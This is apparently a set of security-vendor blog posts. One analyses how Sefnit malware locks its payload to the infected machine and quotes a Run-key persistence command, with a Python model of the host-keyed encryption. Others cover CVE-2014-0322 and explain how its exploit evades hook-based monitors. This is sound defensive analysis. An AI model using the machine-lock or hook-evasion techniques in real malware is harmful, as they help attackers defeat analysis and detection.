Sefnit is a malware family used for ad-click fraud. Infected computers silently request advertisement links in the background, inflating click counts so that pay-per-click revenue is credited to the fraudster.

This is usually done by installing a malicious DLL in the system that monitors active browsing sessions and injects code into any request made by the user. It may also involve the use of malicious browser add-ons, which perform the same function.

Back to our case: We had to describe the features in the malware sample submitted by one of our customers, but the sample wouldn’t replicate in our environment.

The sample was a DLL packed with Themida, a well-known packer and code protector that is hard to reverse-engineer. Accompanying the sample was a file with the same name as the DLL but the extension .idx. It contained encrypted data.

After removing the Themida packer layer, we found the code to read and decrypt the .idx file. The DLL file was simply decrypting the content of .idx and loading it in memory.

But one thing caught our attention and explained why we were not able to replicate the sample: The “key” to decrypt the file was formed by hashing information from the machine on which it ran. The malware collected information such as machine GUID, the folder where it was started, computer name, and other data to generate a hash, which was then used as the key.

If the sample was not run from a specific folder, on a specific machine, it would not decrypt the payload.

How was that encrypted file generated? How did the malware author know what information was present on the target machine to create a file that was unique to it?

Connecting the Dots

We knew that this detection was pretty prevalent, with thousands of detections per day, and that got us thinking: how could the malware be so widespread and at the same time unique to each machine, which is a characteristic of a targeted attack?

Sefnit-FAT detection data. (Source: McAfee GTI)

Looking at our Global Threat Intelligence (GTI) data, we noticed that Sefnit-FAT overlapped samples detected by another detection: Trojan-FDNK.

Our GTI data allow us to relate samples based on several factors, and one that helped us is replication data. We were able to find an executable (MD5: 129FFF31E13180F6E42C1991FB20EA12) that during replication dropped another sample detected by Trojan-FDNK. That was possibly a dropper for the DLL we were trying to analyze.

The file was a small executable (less than 50KB) with a PDF icon. These files are usually dropped on user systems by exploit kits such as Blackhole, Redkit, or Cool. We detect these as Dropper-FJS, Sefnit-FDNJ, and Trojan-FDLW, among others.

This executable turned out to be another layer of obfuscation. Once executed, it looks for setup.dat in the same folder where it is located, and decrypts this content in memory, generating a DLL. Let’s call this the Dropper DLL.

This DLL is never written to disk, but instead is loaded in memory and executes from its entry point. When analyzing what this DLL did, we noticed that it was Sefnit.

Sefnit at Work

So we were able to find a dropper for the Sefnit DLL, but it was not clear yet how it was locked to run only on one specific machine. We took a closer look at the Dropper DLL, and what we found was pretty interesting.

Once the DLL executes, it collects the following information:

  • Machine GUID
  • System Driver: Name
  • Process: Name, Executable Path
  • Network Adapter Configuration: Caption, Description, MAC Address
  • Computer System Product
  • Operating System
  • Processor
  • Onboard Device
  • CDROM Drive
  • Sound Device
  • Logical Disk
  • Disk Drive
  • Physical Media
  • Computer System
  • Base Board
  • System Enclosure
  • Display Configuration
  • Video Controller
  • BIOS
  • System
  • System Board: Product, OEM string array, Model, Caption, Serial number, Version, Manufacturer

The first hint that this had something to do with our DLL was the collection of the machine GUID, which the Loader DLL (the DLL submitted by our customer) used to decrypt its payload. Comparing the function that collects this value in the Dropper DLL Sefnit sample with the one in the Loader DLL, we confirmed that the two have exactly the same code:

(Side-by-side disassembly: the code that collects the machine GUID matches exactly in the Dropper DLL and the Loader DLL.)

This information is encrypted and sent to the malicious control server for this malware. The server then sends another DLL, which is specifically tailored for the infected machine. And that DLL is exactly what we had from our customer.

This custom DLL was configured to look for a file in the same folder where it was dropped and with the same name as itself, but using one of four extensions: .idx, .lck, .txt, or .dat.

It decrypts this file using the same information collected by Dropper DLL, and starts this decrypted content the same way that the Dropper DLL was started.

We now had almost the full picture, but one piece was still missing: What was the content of the .idx file we received?

Exposing the Plot

Continuing our analysis of the Dropper DLL, we noticed that after receiving the Loader DLL from the web server, it creates an entry under the Run key to start the loader after reboot:

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run = regsvr32 /s %appdata%\loader.dll

(The preceding DLL name is just an example. The actual DLL might have random names on different systems.)

At this point, we solved the mystery: the Dropper DLL, which was created in memory by the executable, encrypted itself using the same information collected earlier and wrote the encrypted data to a file named after the Loader DLL sent from the server, using one of the four extensions we named.

We analyzed the rest of the code and found how the machine lock observed in the initial DLL is generated. The following graphic illustrates the process:

Flowchart of a Sefnit infection.

As we can see, the mysterious .idx is the same thing as the Dropper DLL generated in memory by the executable, which in turn was dropped on the system by the exploit kit.

We have found several other files with the same name (setup.dat) in our database; all of them can be decrypted by the same executable and generate the same malware.
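The machine lock described in this post (the host-derived key the customer’s DLL needed, and the dropper-side encryption of the in-memory Dropper DLL into the .idx sidecar), modelled as an added example; this is not Sefnit’s code. The post does not name the hash or the cipher, so SHA-256 and an XOR keystream from SHAKE-256 are assumed stand-ins, and the fingerprint fields are limited to the three the post calls out (machine GUID, start folder, computer name). Host values and the fake DLL body are constructed.

```python
"""Added example (not Sefnit's own code): a machine-locked payload.

The dropper fingerprints the host, hashes that into a key, encrypts the
in-memory Dropper DLL and writes it beside the Loader DLL as <loader>.idx.
The loader rebuilds the key from the live host and decrypts. On any other
machine, or from any other folder, the key differs and the output is noise,
which is why the sample would not replicate in an analysis environment.

Assumptions: SHA-256 as the key-derivation hash and XOR with a SHAKE-256
keystream as the cipher. Neither is stated in the post.
"""
from __future__ import annotations

import hashlib
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class HostFingerprint:
    machine_guid: str   # HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid
    start_dir: str      # folder the DLL was started from
    computer_name: str

    def key(self) -> bytes:
        # Assumed derivation. A separator that cannot occur in the fields keeps
        # "ab"+"c" and "a"+"bc" from hashing to the same key.
        material = "\x00".join((self.machine_guid, self.start_dir, self.computer_name))
        return hashlib.sha256(material.encode("utf-8")).digest()


def xor_stream(key: bytes, data: bytes) -> bytes:
    """Stand-in cipher: XOR with a SHAKE-256 keystream derived from key."""
    stream = hashlib.shake_256(key).digest(len(data))
    return bytes(a ^ b for a, b in zip(data, stream))


def lock_payload(host: HostFingerprint, dropper_dll: bytes) -> bytes:
    """Dropper side: encrypt the in-memory DLL for this host only (the .idx body)."""
    return xor_stream(host.key(), dropper_dll)


def unlock_payload(host: HostFingerprint, idx_blob: bytes) -> Optional[bytes]:
    """Loader side: decrypt and sanity-check. None means the host does not match."""
    candidate = xor_stream(host.key(), idx_blob)
    # A PE image starts with "MZ"; anything else means the key was wrong.
    return candidate if candidate[:2] == b"MZ" else None


def loader_sidecar_name(loader_path: str, ext: str = ".idx") -> str:
    """The loader looks for a file with its own name and one of four extensions."""
    if ext not in (".idx", ".lck", ".txt", ".dat"):
        raise ValueError("unexpected sidecar extension")
    stem = loader_path.rsplit(".", 1)[0]
    return stem + ext


# Constructed fixtures: a victim host, an analysis VM, and a fake DLL body.
VICTIM = HostFingerprint("8f4c1a2e-0000-4000-8000-00000000c0de",
                         r"C:\Users\v\AppData\Roaming", "VICTIM-PC")
SANDBOX = HostFingerprint("11111111-2222-3333-4444-555555555555",
                          r"C:\sandbox", "ANALYSIS-VM")
DROPPER_DLL = b"MZ\x90\x00" + b"constructed fake dropper dll body"
IDX_BLOB = lock_payload(VICTIM, DROPPER_DLL)

if __name__ == "__main__":
    print(loader_sidecar_name(r"C:\Users\v\AppData\Roaming\loader.dll"))
    print("victim unlocks:", unlock_payload(VICTIM, IDX_BLOB) is not None)
    print("sandbox unlocks:", unlock_payload(SANDBOX, IDX_BLOB) is not None)
```

The practical consequence for an analyst is the one the post reaches: to replicate such a sample you must either run it on the original host or feed the loader the victim’s fingerprint values (here, construct the matching HostFingerprint), and the dropper’s fingerprinting routine tells you exactly which values those are.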

Conclusion

The group behind this malware goes to considerable lengths to ensure that each sample runs only on the specific machine it was built for. The aim is to keep malware analysts and automated analysis systems from learning what the malware does: moved to any other machine, the payload never decrypts, so the code is never exposed to anyone trying to see what is happening.

This may seem like too much work just to hide ad-click fraud, but if you have read our other reports you will know that these miscreants earn millions of dollars each year.

But with the power of our GTI infrastructure and a little ingenuity, we were able to uncover this malicious scheme and protect our customers.


Product Coverage and Mitigation for CVE-2014-0322 (Microsoft Internet Explorer)


On February 19, Microsoft released Security Advisory 2934088 for Microsoft Internet Explorer. The vulnerability had been reported by third parties during the second week of February 2014, and in-the-wild exploitation has been observed going back at least to early January 2014.

Specifically, the flaw is a use-after-free condition during Internet Explorer’s processing of specific CMarkup objects.

We are currently analyzing details and indicators. Watch this space for updates, indicators, and more information about this threat.

 

Current McAfee product coverage and mitigation:

  • McAfee Vulnerability Manager: The FSL/MVM package of February 13 includes a vulnerability check to assess if your systems are at risk.
  • McAfee Application Control: Run-Time Control locks down systems and provides protection in the form of Execution Control and Memory Protection.
  • McAfee VirusScan: Coverage for known associated malware is provided in the 7350 DATs (February 15) as “Exploit-SWF” and in the 7354 DATs (February 19) as “Exploit-CVE2014-0322” and “Backdoor-FBSR”.
  • McAfee Web Gateway: Coverage for known associated malware is provided in the 7350 DATs (February 15) as “Exploit-SWF” and in the 7354 DATs (February 19) as “Exploit-CVE2014-0322” and “Backdoor-FBSR”.
  • McAfee GTI / Web / URL Reputation-enabled Controls: McAfee products with GTI enabled will block/identify malicious IP/Domain/URL traffic associated with this threat.

 



Internet Explorer Zero Day Offers Unusual Case Study


While analyzing a recent Internet Explorer zero-day vulnerability, CVE-2014-0322 (containing the Flash sample hash b9c9dab0fd30418884800afebbaba4d99f4526ef0c9a47972a20ab20fed0a06d), we noticed the exploit makes an unorthodox call to ZwProtectVirtualMemory to bypass data execution prevention.

What is different about this call? The arguments of ZwProtectVirtualMemory are laid out in an unusual way. Normally an argument that points to a stack variable holds an address greater than the extended stack pointer (ESP), that is, it points into the already allocated region of the stack. After setting up the stack pivot, the exploit calls ZwProtectVirtualMemory as shown in this screen:

(Disassembly of the ZwProtectVirtualMemory call made after the stack pivot)

NTSYSAPI NTSTATUS NTAPI ZwProtectVirtualMemory(
    _In_  HANDLE  ProcessHandle,
    _In_  PVOID   *BaseAddress,
    _In_  SIZE_T  *NumberOfBytesToProtect,
    _In_  ULONG   NewAccessProtection,
    _Out_ PULONG  OldAccessProtection
);

The third parameter is a pointer to a stack variable, but that variable lies in the not-yet-allocated region of the stack: the pointer should be greater than ESP, yet here it is smaller.

The user-mode Zw* stubs barely touch the stack: each is a thin wrapper that traps into the kernel, and the kernel services the call on its own kernel-mode stack, so the memory just below ESP is left alone. Without a hook on ZwProtectVirtualMemory the call therefore works exactly like a normal one. With a user-mode hook in place (as in hook-based detection systems), the hook’s prologue and local variables land below ESP, right where the exploit stored the size value that NumberOfBytesToProtect points to; the value is overwritten, the API call fails, and the exploit most likely fails with it. The result is an unusual form of evasion: in the presence of a hook-based detection system the exploit simply breaks instead of revealing itself.
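A hook-side check for the layout just described, as an added example (not from the post and not tied to any particular sandbox product). It decodes a constructed 32-bit stdcall argument snapshot for ZwProtectVirtualMemory and flags any pointer argument that refers to stack memory below ESP, the region a hook’s own frame is about to overwrite. The addresses, stack bounds and the assumed hook frame size are made up; the parameter order and types follow the prototype above.

```python
"""Added example: flag ZwProtectVirtualMemory arguments that point below ESP.

A user-mode hook runs on the caller's stack. Its prologue and locals occupy
memory below the ESP seen at the call, so a pointer argument that refers to
that region (as the exploit's NumberOfBytesToProtect pointer does) is
overwritten before the hook reads through it. Two consequences: a hook must
snapshot the raw argument words before it touches the stack, and a pointer
argument below ESP is itself a strong anomaly worth reporting.

Everything below is constructed: 32-bit stdcall layout, made-up addresses,
and an assumed hook frame size.
"""
from __future__ import annotations

from dataclasses import dataclass

# (name, is_pointer) in stdcall order: [ESP+4], [ESP+8], ... at hook entry.
ZW_PROTECT_VM_PARAMS = (
    ("ProcessHandle", False),
    ("BaseAddress", True),
    ("NumberOfBytesToProtect", True),
    ("NewAccessProtection", False),
    ("OldAccessProtection", True),
)
PAGE_EXECUTE_READWRITE = 0x40


@dataclass(frozen=True)
class CallSnapshot:
    esp: int                 # ESP at hook entry (points at the return address)
    stack_limit: int         # lowest committed address of this thread's stack
    stack_base: int          # highest address of the stack (exclusive)
    args: tuple[int, ...]    # raw dwords read from [ESP+4], [ESP+8], ...


def decode_args(snap: CallSnapshot) -> dict[str, int]:
    if len(snap.args) != len(ZW_PROTECT_VM_PARAMS):
        raise ValueError("ZwProtectVirtualMemory takes five arguments")
    return {name: v for (name, _), v in zip(ZW_PROTECT_VM_PARAMS, snap.args)}


def hook_frame_range(snap: CallSnapshot, frame_bytes: int) -> tuple[int, int]:
    """Region a hook with frame_bytes of locals will write: [ESP - frame_bytes, ESP)."""
    return (snap.esp - frame_bytes, snap.esp)


def pointer_anomalies(snap: CallSnapshot, frame_bytes: int = 0x40) -> list[str]:
    """Report pointer args that live in the not-yet-allocated stack below ESP."""
    args = decode_args(snap)
    lo, hi = hook_frame_range(snap, frame_bytes)
    findings: list[str] = []
    for name, is_ptr in ZW_PROTECT_VM_PARAMS:
        p = args[name]
        if not is_ptr or not (snap.stack_limit <= p < snap.stack_base):
            continue  # not a stack pointer (heap, module data): out of scope here
        if p < snap.esp:
            inside_frame = lo <= p < hi
            findings.append(f"{name}=0x{p:08x} is below ESP=0x{snap.esp:08x}"
                            + (" (inside the hook's own frame)" if inside_frame else ""))
    return findings


def requests_rwx(snap: CallSnapshot) -> bool:
    """Turning a page writable and executable is the usual DEP-bypass request."""
    return decode_args(snap)["NewAccessProtection"] == PAGE_EXECUTE_READWRITE


# Constructed snapshot: pivoted stack, size variable placed at ESP-0x10.
PIVOTED = CallSnapshot(
    esp=0x0012F000, stack_limit=0x0012C000, stack_base=0x00130000,
    args=(0xFFFFFFFF, 0x0012F040, 0x0012EFF0, PAGE_EXECUTE_READWRITE, 0x0012F044),
)
# Same call with a well-formed frame: every pointer sits at or above ESP.
NORMAL = CallSnapshot(
    esp=0x0012F000, stack_limit=0x0012C000, stack_base=0x00130000,
    args=(0xFFFFFFFF, 0x0012F040, 0x0012F048, PAGE_EXECUTE_READWRITE, 0x0012F044),
)

if __name__ == "__main__":
    for finding in pointer_anomalies(PIVOTED):
        print("ANOMALY:", finding)
```

The frame_bytes parameter is the practical knob: the anomaly exists whenever a pointer is below ESP, but whether a given hook actually corrupts the value depends on how deep its own frame is, which is why the exploit "works" under some monitors and fails under others.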

We have also seen similar exploitation scenarios in the CVE-2013-3918 zero-day attack.

